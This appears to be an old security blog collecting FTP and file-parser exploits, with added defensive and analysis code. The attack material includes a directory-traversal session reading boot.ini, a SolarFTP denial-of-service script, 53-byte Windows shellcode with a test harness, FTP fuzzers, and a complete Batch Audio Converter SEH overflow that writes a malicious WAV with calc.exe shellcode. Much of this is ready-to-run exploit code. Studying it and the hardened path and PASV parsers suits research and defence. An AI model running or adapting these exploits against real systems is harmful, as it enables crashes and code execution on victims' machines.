QuickShare File Server 1.2.1 FTP Directory Traversal Vulnerability

QuickShare File Server is prone to an FTP directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied paths. Exploiting this issue allows an attacker to read files outside the FTP root directory and possibly gain further access to the system.

Software Description

QuickShare File Server is an easy-to-use file sharing program that helps you build your own file server. Users can access your server through a web browser or an FTP client (in most cases they do not need to install any extra software). Users can send large files to you or receive them from you. You can create accounts and set passwords to protect your files.

Exploit Information

It's an FTP directory traversal. A user without permission to the rest of the filesystem can retrieve a file outside the configured share directory (e.g. a file from %systemroot%). This vulnerability can be exploited by anonymous or authenticated users.

POC

Below is the proof of concept: an authenticated user logs in to the QuickShare FTP server from Ubuntu Linux. The lines beginning with ftp> are the commands typed into the QuickShare FTP server. Note that the server answers SYST with "UNIX" (hence "Remote system type is UNIX") even though it is running on Windows, as the retrieved boot.ini shows.

modpr0be@digital-echidna:~$ ftp 10.5.5.27
Connected to 10.5.5.27.
220 quickshare ftpd ready.
Name (10.5.5.27:modpr0be): ftpuser
331 User name okay, need password.
Password: *******
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get ../../../../../../../../boot.ini boot.ini
local: boot.ini remote: ../../../../../../../../boot.ini
200 PORT command successful. Consider using PASV.
150 Opening BINARY connection.
226 File send OK.
211 bytes received in 0.00 secs (127.0 kB/s)
ftp> quit
221 Goodbye.
modpr0be@digital-echidna:~$ cat boot.ini
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect
modpr0be@digital-echidna:~$
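The bug class behind this advisory is a path join that trusts the client. As an added example (not QuickShare's code, which is closed source), the following Python shows the vulnerable pattern next to a hardened `safe_join` for a Windows or POSIX file server: it treats backslashes as separators, rejects absolute paths, drive letters and NUL bytes, refuses anything that lexically leaves the share root, and then compares real paths so that a symlink planted inside the share cannot point outside it either. The function names and the share layout are assumptions for illustration.

```python
"""Path containment for a file server: vulnerable join vs. hardened join.
Added example; not code from QuickShare or from the advisory."""
import os
import posixpath


class PathTraversal(ValueError):
    """Raised when a client-supplied path would leave the share root."""


def naive_join(root, user_path):
    # Vulnerable pattern: the client's path is joined onto the share root as-is,
    # so "../../../../boot.ini" resolves straight out of the share.
    return os.path.normpath(os.path.join(root, user_path))


def safe_join(root, user_path):
    """Return the real filesystem path for `user_path` inside `root`, or raise."""
    if "\x00" in user_path:
        raise PathTraversal("NUL byte in path")
    p = user_path.replace("\\", "/")           # Windows servers accept either separator
    if p.startswith("/") or (len(p) > 1 and p[1] == ":"):
        raise PathTraversal("absolute path or drive letter rejected: %r" % user_path)
    p = posixpath.normpath(p)                  # collapses "a/../b", "./x", "a//b"
    if p == ".." or p.startswith("../"):
        raise PathTraversal("path escapes the share root: %r" % user_path)
    # Lexical checks do not see symlinks; compare the resolved paths as well.
    root_real = os.path.realpath(root)
    target = os.path.realpath(os.path.join(root_real, *p.split("/")))
    try:
        inside = os.path.commonpath([root_real, target]) == root_real
    except ValueError:                         # different drives on Windows
        inside = False
    if not inside:
        raise PathTraversal("resolved path leaves the share root: %r" % user_path)
    return target


if __name__ == "__main__":
    share = os.getcwd()                        # assumed share root for the demo
    print(naive_join(share, "../../../../../../../../boot.ini"))   # walks out of the share
    for candidate in ("pub/readme.txt", "..\\..\\boot.ini", "/etc/passwd"):
        try:
            print("ok     ", safe_join(share, candidate))
        except PathTraversal as e:
            print("reject ", e)
```

Both the lexical check and the `realpath` comparison are needed: the first stops `../` and `..\` sequences before anything touches the disk, the second catches links created inside the share by an upload. Run the service under an account that can only read the share so that a parser bug still cannot reach %systemroot%.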

Fix and Update

The QuickShare team has fixed this vulnerability and released version 1.2.2.

FTPGetter v3.58.0.21 Buffer Overflow (PASV) Exploit

A vulnerability has been discovered in FTPGetter, which can be exploited by malicious people to compromise a user’s system.

The issue is likely due to insufficient bounds checking and is triggered when the affected FTP client connects to a malicious server and requests passive mode. The client issues the PASV command to tell the server that it wishes to transfer files in passive mode; an FTP server that supports passive mode answers with a 227 reply carrying the IP address and port number the client should connect to for the data channel, and it is the handling of that server-controlled reply that overflows.

Successful exploitation allows execution of arbitrary code, but requires that the user is tricked into connecting to a malicious FTP server.
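The 227 reply is the one piece of attacker-controlled input in this flow, so it is worth seeing what a defensive parser for it looks like. The following Python is an added example, not FTPGetter's code (its parser is closed source and the exact fault is not public): it caps the reply length before doing anything else, extracts the six numbers with a strict pattern, range-checks every field, and refuses a data address that differs from the control-connection peer unless the caller opts in, since a server-chosen address is how PASV gets abused for port scanning and traffic redirection. `MAX_REPLY_LEN`, the privileged-port cut-off and the sample replies are assumptions of the example.

```python
"""Defensive parser for the FTP 227 (PASV) reply. Added example; not the
client's own code."""
import re

MAX_REPLY_LEN = 512   # assumed cap: real 227 replies are one short line
_PASV_RE = re.compile(
    r"^227 [^\r\n]*?\((\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})\)"
)


class BadPasvReply(ValueError):
    pass


def parse_pasv(reply, control_peer_ip, allow_foreign_address=False):
    """Return (ip, port) from a 227 reply, or raise BadPasvReply.

    reply            -- bytes or str as read from the control connection
    control_peer_ip  -- the address we actually connected to
    """
    if len(reply) > MAX_REPLY_LEN:             # length first, before any parsing
        raise BadPasvReply("227 reply too long (%d bytes)" % len(reply))
    if isinstance(reply, bytes):
        reply = reply.decode("ascii", "replace")
    m = _PASV_RE.match(reply)
    if m is None:
        raise BadPasvReply("malformed 227 reply: %r" % reply[:40])
    nums = [int(x) for x in m.groups()]
    if any(n > 255 for n in nums):             # \d{1,3} admits 256..999
        raise BadPasvReply("field out of range in %r" % m.group(0))
    ip = ".".join(str(n) for n in nums[:4])
    port = nums[4] * 256 + nums[5]
    if port < 1024:                            # a server pointing us at port 25 or 80 is a bounce, not a transfer
        raise BadPasvReply("refusing privileged data port %d" % port)
    if ip != control_peer_ip and not allow_foreign_address:
        raise BadPasvReply("server asked for a data connection to %s, control peer is %s"
                           % (ip, control_peer_ip))
    return ip, port


if __name__ == "__main__":
    # Constructed replies: one honest, one over-long, one redirecting elsewhere.
    for sample in (b"227 Entering Passive Mode (10,5,5,27,195,80).\r\n",
                   b"227 " + b"A" * 4000 + b"\r\n",
                   b"227 Entering Passive Mode (192,168,1,1,0,80).\r\n"):
        try:
            print("data channel", parse_pasv(sample, "10.5.5.27"))
        except BadPasvReply as e:
            print("rejected:", e)
```

Ignoring the address in the reply and always connecting to the control peer (what curl does with `--ftp-skip-pasv-ip`) is the safer default for a client; the opt-in flag here exists only for servers behind NAT that genuinely advertise a different address.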

Software Description

Save time on FTP/SFTP updates! Plan your uploads and automate the workflow. Schedule and automate file transfers with a centralized console. Let your computer move or synchronize information securely between home and office automatically according to the schedule!

Exploit Information

The overflow is triggered by the server's reply to the PASV command: the client does not handle a crafted reply safely, and the result is a buffer overflow. This exploit is unstable and should be used only as a PoC. I tried it several times on various systems and the buffer layout sometimes changed.

Some Conditions to PoC

This PoC uses "the most selling feature", Automated FTP Requests: I used Auto Download with / as the Source Files, and set Scheduler Settings to Repetitive. Make sure the program is running before launching the PoC.

It’s a part of “Death of an FTP Client” 🙂
For more information, see:
http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/

Proof of Concept

http://www.exploit-db.com/exploits/16101/

Fix and Update

Do not connect to untrusted FTP servers. No fix or update is available yet; we will update this post if the vendor fixes the bug.

UPDATE: the FTPGetter team has released a new version of FTPGetter; more information is on their website.

SolarFTP 2.0 Multiple Commands Denial of Service Vulnerability

SolarFTP Server 2.0 is prone to a denial-of-service condition: it fails to properly sanitize user-supplied input. With a specially crafted 'USER', 'APPE', 'GET', 'PUT' or 'NLST' command, a remote attacker can disable the FTP service.

Software Description

Solar FTP Server is a handy and easy to use personal FTP server with features like virtual directories, simple and intuitive user interface, real-time activity monitoring and management.

Testing and Fuzzing

Using Very Simple FTP Fuzzer (the script further down this page), we tested the FTP server with various commands. The first command we sent was APPE (append): the Windows exception dialog popped up, which indicated that the server might be vulnerable to some commands.

Unfortunately, the junk we sent overwrote neither SEH nor EIP; it only ended in a denial of service. In conclusion, four commands make the server crash: APPE, NLST, PUT, and GET. Note that GET and PUT are FTP client commands rather than protocol verbs (the protocol equivalents are RETR and STOR); the fuzzer sends the command string verbatim, so what crashed here was the server's handling of an unrecognized verb with a long argument.
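The page's fuzzer sends growing payloads and leaves the operator watching the debugger. As an added example (not the page's fuzzer and not SolarFTP's code), the Python below adds the piece a practitioner usually wants: it notices when the service stops answering and reports the payload length that did it. `start_fake_ftpd` is a constructed stand-in for a vulnerable server that dies when an APPE argument exceeds a chosen length, so the harness can be exercised offline; against a real target only `fuzz_command` is used. The crash threshold, credentials and step sizes are assumptions of the example.

```python
"""Crash-detecting FTP command fuzzer with a constructed vulnerable server.
Added example; not the page's 'Very Simple FTP Fuzzer'."""
import socket
import threading


def start_fake_ftpd(crash_at=250):
    """Listen on 127.0.0.1:<ephemeral> and return the port.
    Simulated bug: an APPE argument longer than crash_at 'kills' the process,
    i.e. the client gets EOF and further connections are refused."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(5)
    port = listener.getsockname()[1]

    def handle(conn):
        conn.sendall(b"220 fake ftpd ready\r\n")
        for raw in conn.makefile("rb"):
            verb, _, arg = raw.rstrip(b"\r\n").partition(b" ")
            if verb == b"USER":
                conn.sendall(b"331 User name okay, need password.\r\n")
            elif verb == b"PASS":
                conn.sendall(b"230 Login successful.\r\n")
            elif verb == b"QUIT":
                conn.sendall(b"221 Goodbye.\r\n")
                return True
            elif verb == b"APPE" and len(arg) > crash_at:
                return False                      # the crash: no reply at all
            else:
                conn.sendall(b"200 Command okay.\r\n")
        return True

    def serve():
        while True:
            try:
                conn, _ = listener.accept()
            except OSError:
                return
            try:
                with conn:
                    alive = handle(conn)
            except OSError:
                alive = True
            if not alive:
                listener.close()                  # process gone: new connects are refused
                return

    threading.Thread(target=serve, daemon=True).start()
    return port


def fuzz_command(host, port, command, user=b"ftp", password=b"ftp",
                 start=100, step=100, limit=10000, timeout=3.0):
    """Send `command` with start, start+step, ... bytes of 'A' in fresh sessions.
    Returns the first payload length after which the server stopped replying,
    or None if it survived everything up to `limit`."""
    for length in range(start, limit + 1, step):
        try:
            s = socket.create_connection((host, port), timeout=timeout)
        except OSError:
            if length == start:
                raise                               # target was never reachable
            return length - step                    # died after replying to the previous payload
        with s:
            s.recv(1024)                            # banner
            s.sendall(b"USER " + user + b"\r\n"); s.recv(1024)
            s.sendall(b"PASS " + password + b"\r\n"); s.recv(1024)
            s.sendall(command + b" " + b"A" * length + b"\r\n")
            try:
                reply = s.recv(1024)
            except (ConnectionResetError, socket.timeout):
                reply = b""
            if not reply:                           # EOF, reset or silence: the service is gone
                return length
            s.sendall(b"QUIT\r\n"); s.recv(1024)
    return None


if __name__ == "__main__":
    port = start_fake_ftpd(crash_at=250)
    print("APPE crashed the fake server at", fuzz_command("127.0.0.1", port, b"APPE", limit=1000), "bytes")
```

On a real target the interesting length is the smallest one that kills the service; restart the server, replay that single payload under a debugger, and inspect the registers and the SEH chain, which for SolarFTP 2.0 showed only junk on the stack and no control of EIP or SEH.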

Proof of Concept

Here is the Python script for the PoC.

#!/usr/bin/python
# Python 2 script.
# Exploit Title: SolarFTP 2.0 Multiple Commands Denial of Service Vulnerability
# Date: 12/17/2010
# Author: modpr0be
# Software Link: http://www.solarftp.com/files/solarftps-setup.exe
# Vulnerable version: 2.0
# Tested on: Windows XP SP2, Windows XP SP3
# CVE : N/A
#
# http://www.digital-echidna.org
#
# Greetz:
#   say hello to all digital-echidna org crew:
#       otoy, bean, s3o, d00m, n0rf0x, fm, gotechidna, manix
#   special thx to amalia (^^), oebaj, offsec, exploit-db, corelan team
#
#### Software description:
# Solar FTP Server is a handy and easy to use personal FTP server with
# features like virtual directories, simple and intuitive user interface,
# real-time activity monitoring and management.
#
#### Exploit information:
# SolarFTP 2.0 suddenly stops (crashes) when any of these commands is sent
# with an over-long argument: APPE, GET, PUT, NLST, and MDTM.
# Sending USER with junk also crashes the Admin Configuration but not the service.
# The stack contains our junk at random positions. Neither EIP nor SEH was overwritten.
#
#### Other information:
# 12/10/2010 - vendor contacted
# 12/17/2010 - no response, advisory released

import socket, sys

# 80000 bytes of 0x41 ('A'); the server dies while handling the over-long argument.
junk = "\x41" * 80000

def banner():
    print "\nSolarFTP 2.0 Multiple Commands Denial of Service Vulnerability."
    print "By: modpr0be (modpr0be[at]digital-echidna[dot]org)\n"

if len(sys.argv) != 4:
    banner()
    print "Usage: %s <host> <username> <password>\n" % sys.argv[0]
    sys.exit(0)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((sys.argv[1], 21))
except socket.error:
    print "Can't connect to server!\n"
    sys.exit(0)

s.recv(1024)                              # banner
s.send('USER ' + sys.argv[2] + '\r\n')    # log in first; the crashing command is sent inside a session
s.recv(1024)
s.send('PASS ' + sys.argv[3] + '\r\n')
s.recv(1024)
s.send('APPE ' + junk + '\r\n')           # APPE with 80000 bytes of junk kills the service
s.recv(1024)
s.close()

Or you can download it from Exploit-DB at the link below:
http://www.exploit-db.com/exploits/15750/

Fix and Update

Download the latest version from the SolarFTP website.

53 bytes – Windows XP SP3 (en) notepad.exe win32 Shellcode

Finally, my first win32 shellcode.

It executes notepad.exe when loaded: it builds the string "cmd.exe /c notepad" on the stack, calls WinExec on it, then calls ExitProcess. Both functions are called through hard-coded kernel32.dll addresses, so it runs on Windows XP SP3 English only; on any other build kernel32.dll sits at a different base and the calls will crash.

/*
(o_Ov) say hello to all digital-echidna org crew:
otoy, bean, s3o, d00m, n0rf0x, fm, gotechidna, manix

special thx to offsec, exploit-db, and corelan team
*/

/* shellcodetest.c: makes the buffer executable and jumps into it.
   Addresses are hard-coded for Windows XP SP3 (en). */
#include <windows.h>

char code[] = "\x31\xc0\x50\xb8\x72\x75\x11\x11"   /* xor eax,eax; push eax; mov eax,0x11117572 */
"\x2d\x11\x11\x11\x11\x50\x68\x6f"                 /* sub eax,0x11111111 -> "ad\0\0"; push eax; push "otep" */
"\x74\x65\x70\x68\x2f\x63\x20\x6e"                 /* push "/c n" */
"\x68\x65\x78\x65\x20\x68\x63\x6d"                 /* push "exe "; push "cmd." */
"\x64\x2e\x89\xe3\x50\x53\xbb"                     /* mov ebx,esp; push eax (uCmdShow); push ebx (lpCmdLine) */
"\x0d\x25\x86\x7c"			/*Kernel32.dll.WinExec*/
"\xff\xd3\x50\xbb"                                 /* call ebx; push eax (exit code) */
"\x12\xcb\x81\x7c"			/*Kernel32.dll.ExitProcess*/
"\xff\xd3";                                        /* call ebx */

int main(int argc, char **argv)
{
	DWORD old;
	int (*func)();

	/* The .data section is not executable with DEP on, so mark the buffer RWX first. */
	if (!VirtualProtect(code, sizeof code, PAGE_EXECUTE_READWRITE, &old))
		return 1;
	func = (int (*)()) code;
	(int)(*func)();
	return 0;
}
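Before running an unknown stub like the one above, it is worth confirming statically what it does. The Python below is an added example, not part of the original post: a tiny symbolic executor for the handful of x86 opcodes the stub uses (xor eax,eax; push reg; push imm32; mov reg,imm32; sub eax,imm32; mov ebx,esp; call ebx). It reconstructs the string assembled on the stack and the absolute addresses called, so the payload can be verified without executing it. The labels for the two addresses come from the post's own comments (XP SP3 en); the stack base and the stand-in return value are arbitrary simulation constants.

```python
"""Static decoder for the 53-byte WinExec/ExitProcess stub. Added example."""
import struct

# The stub exactly as printed in the post (constructed copy).
NOTEPAD_SHELLCODE = (
    b"\x31\xc0\x50\xb8\x72\x75\x11\x11"
    b"\x2d\x11\x11\x11\x11\x50\x68\x6f"
    b"\x74\x65\x70\x68\x2f\x63\x20\x6e"
    b"\x68\x65\x78\x65\x20\x68\x63\x6d"
    b"\x64\x2e\x89\xe3\x50\x53\xbb"
    b"\x0d\x25\x86\x7c"
    b"\xff\xd3\x50\xbb"
    b"\x12\xcb\x81\x7c"
    b"\xff\xd3"
)

# Addresses the post attributes to kernel32.dll on XP SP3 (en); used only to label calls.
KNOWN_EXPORTS = {0x7C86250D: "kernel32!WinExec", 0x7C81CB12: "kernel32!ExitProcess"}
STACK_BASE = 0x0012FF00     # arbitrary initial ESP for the simulation
MASK = 0xFFFFFFFF
RETURN_VALUE = 33           # stand-in for WinExec's ">31 means success" result


def decode(code):
    """Walk the stub; return (listing, calls). Raises on any opcode it does not model."""
    eax = ebx = 0
    esp = STACK_BASE
    stack = bytearray()       # stack[0] is the byte at ESP; pushes prepend
    listing, calls = [], []

    def push(value):
        nonlocal esp
        stack[0:0] = struct.pack("<I", value & MASK)
        esp -= 4

    def u32_at(addr):
        return struct.unpack_from("<I", stack, addr - esp)[0]

    def cstr_at(addr):
        off = addr - esp
        if not 0 <= off < len(stack):
            return None       # not a pointer into the simulated stack
        return stack[off:stack.index(0, off)].decode("ascii")

    i = 0
    while i < len(code):
        op, two = code[i], code[i:i + 2]
        if two == b"\x31\xc0":
            eax = 0; listing.append("xor eax, eax"); i += 2
        elif two == b"\x89\xe3":
            ebx = esp; listing.append("mov ebx, esp"); i += 2
        elif two == b"\xff\xd3":
            name = KNOWN_EXPORTS.get(ebx, "0x%08x" % ebx)
            arg0, arg1 = u32_at(esp), u32_at(esp + 4)     # stdcall: first args at ESP
            calls.append({"address": ebx, "name": name, "arg0": arg0,
                          "arg1": arg1, "arg0_str": cstr_at(arg0)})
            listing.append("call ebx  ; %s" % name)
            eax = RETURN_VALUE; i += 2
        elif op == 0x50:
            push(eax); listing.append("push eax"); i += 1
        elif op == 0x53:
            push(ebx); listing.append("push ebx"); i += 1
        elif op in (0xB8, 0xBB, 0x2D, 0x68):
            imm = struct.unpack_from("<I", code, i + 1)[0]
            if op == 0xB8:
                eax = imm; listing.append("mov eax, 0x%08x" % imm)
            elif op == 0xBB:
                ebx = imm; listing.append("mov ebx, 0x%08x" % imm)
            elif op == 0x2D:
                eax = (eax - imm) & MASK; listing.append("sub eax, 0x%08x" % imm)
            else:
                push(imm); listing.append("push 0x%08x" % imm)
            i += 5
        else:
            raise ValueError("unhandled opcode 0x%02x at offset %d" % (op, i))
    return listing, calls


def command_line(code=NOTEPAD_SHELLCODE):
    """The string handed to WinExec, or None if the stub never calls it."""
    for call in decode(code)[1]:
        if call["name"] == "kernel32!WinExec":
            return call["arg0_str"]
    return None


if __name__ == "__main__":
    listing, calls = decode(NOTEPAD_SHELLCODE)
    print("\n".join(listing))
    for c in calls:
        print("%s(0x%08x, 0x%08x) %s" % (c["name"], c["arg0"], c["arg1"], c["arg0_str"] or ""))
```

The listing shows the mov/sub pair that builds "ad\0\0" without a NUL byte in the code, and why the stub is 53 bytes and position independent but not version independent: the two `mov ebx, imm32` addresses are what a portable version would replace with a PEB walk and export-table lookup.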

0day Linux Escalation Privilege Exploit Collection (Oct-Nov 2010)

I have created a script that collects the local privilege escalation exploits published by Tavis Ormandy on Exploit-DB.com between October and November 2010.

Take a look here: 201011-0day-linux-exploit

*Update 1: I renamed the file and made the script more comfortable to use.
*Update 2: Moved to Github

Please note that I am not responsible for any misuse of this tool; I only collected the exploits into one script. Anyone who downloads this tool is responsible for how they use it.

Very Simple FTP Fuzzer

Written in Python, this is my attempt at a simple fuzzer for FTP servers. The script fuzzes commands such as APPE, USER, LIST, CWD, etc.; you can find all the commands here 😉

This script is simply a modified version of muts' simple FTP fuzzer from the Offsec training 😀

Hope you like it 🙂

#!/usr/bin/env python
# Python 2 script.

########################################################
# Very Simple FTP Fuzzer                               #
# this is a modified version from simple ftp fuzzer    #
# coded by muts                                        #
#                                                      #
# thx: oebaj, offsec, xecureit, jasakom, 0x70y         #
########################################################

import sys, socket
from optparse import OptionParser

usage = "./%prog -t [target] -p [port] -u [ftp user] -P [ftp passwd] -c [command to fuzz]"
usage += "\nExample: ./%prog -t 192.168.10.10 -p 21 -u ftp -P ftp -c APPE"
parser = OptionParser(usage=usage)
parser.add_option("-p", type="int", action="store", dest="port", default=21,
		help="Port to connect (default 21)")
parser.add_option("-t", type="string", action="store", dest="target",
		help="The target server")
parser.add_option("-u", type="string", action="store", dest="username",
		help="FTP username")
parser.add_option("-P", type="string", action="store", dest="password",
		help="FTP password")
parser.add_option("-c", type="string", action="store", dest="fuzz",
		help="Command to fuzz (sent verbatim, e.g. APPE, USER, LIST, CWD)")
(options, args) = parser.parse_args()

def banner():
	print "\n\t\t|------------------------------------------------------------------|"
	print "\t\t|                      Very Simple FTP Fuzzer                      |"
	print "\t\t|------------------------[ by modpr0be ]---------------------------|"
	print "\t\t|-----------------[ modpr0be[at]postnix[dot]org ]------------------|"
	print "\t\t|-------------------[ originally coded by muts ]-------------------|"
	print "\t\t|------------------------------------------------------------------|\n"

if not (options.target and options.username and options.password and options.fuzz):
	banner()
	parser.print_help()
	sys.exit(1)

# Payloads: "A", then "A" * 100, "A" * 200, ... up to "A" * 10000.
buffer = ["A"]
counter = 100
while len(buffer) <= 100:
	buffer.append("A" * counter)
	counter = counter + 100

def cmd():
	# One fresh, authenticated session per payload, so a crash can be
	# attributed to the single command that was just sent (watch the server
	# in a debugger; this script does not detect the crash itself).
	for string in buffer:
		print "Fuzzing command " + options.fuzz + ": " + str(len(string))
		s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		s.connect((options.target, options.port))
		s.recv(1024)
		s.send('USER ' + options.username + '\r\n')
		s.recv(1024)
		s.send('PASS ' + options.password + '\r\n')
		s.recv(1024)
		s.send(options.fuzz + ' ' + string + '\r\n')
		s.recv(1024)
		s.send('QUIT\r\n')
		s.close()

banner()
cmd()

#20109modpr0be

Batch Audio Converter <=v.1.0.0 Stack Overflow (SEH)

Just for fun I went looking for an application I could poke at to play with SEH, and found Batch Audio Converter <= v.0.4.0.0, which I exploited successfully through an SEH overflow (a clear write-up on SEH can be found on Peter Van Eeckhoutte's site and on the oldest Indonesian underground site, Kecoak Elektronik). To check the application's version I looked at Help/About in the application and visited the developer's site. The developer is Freewaretoolbox, so I downloaded the latest version, 1.0.0, and it turned out to still be affected by the buffer overflow.

I immediately emailed the developer so it could be fixed, because this application looks fairly widely used: many internet users regularly convert mp3 to wav or other formats.

In general, this exploitation technique is classed as a local exploit that ends up as a client-side attack, because it needs a third party (the client) to open the file for exploitation to succeed. Below is an excerpt of the proof of concept (PoC) I ran against the application.

#!/usr/bin/python
# Python 2 script.
# PoC for the Batch Audio Converter .wav crash
# SEH 41414141
# nSEH 41414141
# EIP 41414141
#
junk = "A" * 5000
f = open('lagu.wav', 'wb')   # binary mode so no bytes get translated on Windows
f.write(junk)
f.close()

The script above creates a file lagu.wav containing 5000 'A' bytes; open it with Batch Audio Converter and the application will close (read: crash). The full exploitation process requires knowledge of basic buffer overflows and of the SEH overflow technique. Below is the resulting PoC exploit code that successfully launches calc.exe.

#!/usr/bin/python
# Python 2 script.

import struct

junk = "A" * 4132                       # padding up to the SEH record
nseh = "\xeb\x06\x90\x90"               # jmp short +6: hop over the handler address into the NOPs
seh = struct.pack('<L', 0x10029bb7) # pop edi pop esi ret from lame_enc.dll
nop = "\x90" * 30
print "[+] Preparing for file.."
# windows/exec, CMD=calc.exe, EXITFUNC=seh
# 463 bytes, x86/alpha_mixed
shellcode = ("\x89\xe3\xdb\xc6\xd9\x73\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
"\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59\x6a\x41"
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x49"
"\x6c\x49\x78\x4d\x59\x47\x70\x45\x50\x45\x50\x43\x50\x4c\x49"
"\x48\x65\x45\x61\x4e\x32\x42\x44\x4e\x6b\x50\x52\x44\x70\x4c"
"\x4b\x50\x52\x44\x4c\x4e\x6b\x42\x72\x45\x44\x4c\x4b\x43\x42"
"\x46\x48\x44\x4f\x4d\x67\x51\x5a\x46\x46\x44\x71\x4b\x4f\x44"
"\x71\x49\x50\x4e\x4c\x47\x4c\x51\x71\x51\x6c\x43\x32\x46\x4c"
"\x51\x30\x49\x51\x48\x4f\x46\x6d\x45\x51\x49\x57\x4d\x32\x48"
"\x70\x50\x52\x42\x77\x4c\x4b\x46\x32\x44\x50\x4c\x4b\x43\x72"
"\x47\x4c\x47\x71\x4e\x30\x4c\x4b\x47\x30\x51\x68\x4f\x75\x4f"
"\x30\x42\x54\x42\x6a\x46\x61\x4a\x70\x46\x30\x4c\x4b\x43\x78"
"\x46\x78\x4e\x6b\x43\x68\x47\x50\x45\x51\x4b\x63\x4b\x53\x47"
"\x4c\x47\x39\x4e\x6b\x47\x44\x4e\x6b\x46\x61\x48\x56\x50\x31"
"\x49\x6f\x50\x31\x4f\x30\x4c\x6c\x4b\x71\x4a\x6f\x44\x4d\x46"
"\x61\x48\x47\x46\x58\x4d\x30\x44\x35\x49\x64\x43\x33\x43\x4d"
"\x48\x78\x47\x4b\x51\x6d\x47\x54\x51\x65\x4b\x52\x43\x68\x4e"
"\x6b\x46\x38\x47\x54\x47\x71\x4e\x33\x43\x56\x4e\x6b\x46\x6c"
"\x50\x4b\x4c\x4b\x50\x58\x45\x4c\x46\x61\x4b\x63\x4e\x6b\x47"
"\x74\x4c\x4b\x43\x31\x4a\x70\x4c\x49\x42\x64\x44\x64\x46\x44"
"\x51\x4b\x51\x4b\x43\x51\x46\x39\x50\x5a\x42\x71\x4b\x4f\x4b"
"\x50\x46\x38\x51\x4f\x50\x5a\x4e\x6b\x45\x42\x48\x6b\x4c\x46"
"\x51\x4d\x51\x7a\x46\x61\x4c\x4d\x4f\x75\x4f\x49\x47\x70\x43"
"\x30\x43\x30\x46\x30\x42\x48\x50\x31\x4e\x6b\x50\x6f\x4d\x57"
"\x49\x6f\x4b\x65\x4f\x4b\x4b\x4e\x46\x6e\x50\x32\x49\x7a\x43"
"\x58\x4c\x66\x4f\x65\x4f\x4d\x4f\x6d\x4b\x4f\x48\x55\x47\x4c"
"\x47\x76\x51\x6c\x45\x5a\x4d\x50\x4b\x4b\x4d\x30\x44\x35\x43"
"\x35\x4d\x6b\x47\x37\x45\x43\x42\x52\x50\x6f\x51\x7a\x45\x50"
"\x51\x43\x49\x6f\x4b\x65\x43\x53\x45\x31\x42\x4c\x43\x53\x46"
"\x4e\x45\x35\x51\x68\x42\x45\x43\x30\x45\x5a\x41\x41")

f = open('exploit.wav', 'wb')           # binary mode: the payload must reach the parser byte for byte
print "[+] Writing vulnerable WAV file.."
f.write(junk+nseh+seh+nop+shellcode)    # layout: junk | nSEH | SEH | NOP sled | shellcode
f.close()
print "[+] Success writing file.."
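The two numbers that make the exploit above work, the 4132-byte offset and the pop/pop/ret address, come out of a standard workflow: crash the parser with a cyclic pattern, read the SEH record in the debugger, map it back to an offset, then assemble junk | nSEH | SEH | NOPs | shellcode. The Python below is an added example, not the exploit author's code: `pattern_create` / `pattern_offset` reimplement the Metasploit cyclic pattern, and `build_seh_payload` assembles the layout and checks the two invariants that make it work, that the nSEH short jump lands exactly on the first NOP and that the handler address contains no byte the target parser would reject. The placeholder shellcode (an int3 sled of the same 463-byte length) and the default bad-character set are assumptions; the offset and the lame_enc.dll address are the ones from the exploit above.

```python
"""Cyclic pattern offset finding and SEH payload layout. Added example;
not code from the Batch Audio Converter exploit."""
import string
import struct

OFFSET_TO_NSEH = 4132                # from the exploit above
PPR_LAME_ENC = 0x10029BB7            # pop edi / pop esi / ret in lame_enc.dll, from the exploit above
PLACEHOLDER_SHELLCODE = b"\xcc" * 463   # constructed stand-in, same length as the alpha_mixed payload


def pattern_create(length):
    """Metasploit-style cyclic pattern Aa0Aa1Aa2...; every 3-byte window is unique (max 20280 bytes)."""
    if length > 26 * 26 * 10 * 3:
        raise ValueError("pattern longer than 20280 bytes is no longer unique")
    out = []
    for u in string.ascii_uppercase:
        for l in string.ascii_lowercase:
            for d in string.digits:
                out.append(u + l + d)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def pattern_offset(value, length=20280):
    """Map a crash value (dword as shown by the debugger, or its 4-char text) to its offset."""
    if isinstance(value, int):
        value = struct.pack("<I", value).decode("ascii")   # debugger shows it little-endian
    idx = pattern_create(length).find(value)
    if idx < 0:
        raise ValueError("%r is not part of the pattern" % value)
    return idx


def jmp_short_target(payload, at):
    """Decode a 2-byte 'jmp short rel8' at payload[at] and return the offset it jumps to."""
    if payload[at] != 0xEB:
        raise ValueError("no jmp short at offset %d" % at)
    rel8 = struct.unpack_from("<b", payload, at + 1)[0]
    return at + 2 + rel8


def build_seh_payload(offset, ppr_address, shellcode, nop_count=30, bad_chars=b"\x00"):
    """Return (payload, layout) for the junk | nSEH | SEH | NOPs | shellcode layout."""
    seh = struct.pack("<I", ppr_address)
    bad = bytes(b for b in seh if b in bad_chars)       # bad set is parser-specific; NUL is the usual minimum
    if bad:
        raise ValueError("handler address 0x%08x contains bad byte(s) %r" % (ppr_address, bad))
    nseh = b"\xeb\x06\x90\x90"   # jmp short +6 skips the 4-byte handler slot and lands on the sled
    layout = {"nseh": offset, "seh": offset + 4, "sled": offset + 8,
              "shellcode": offset + 8 + nop_count}
    payload = b"A" * offset + nseh + seh + b"\x90" * nop_count + shellcode
    if jmp_short_target(payload, layout["nseh"]) != layout["sled"]:
        raise AssertionError("nSEH jump does not land on the NOP sled")
    return payload, layout


if __name__ == "__main__":
    # Debugger shows SEH = 0x41336141 after a pattern crash: which offset is that?
    print("offset of 0x41336141 in the pattern:", pattern_offset(0x41336141))
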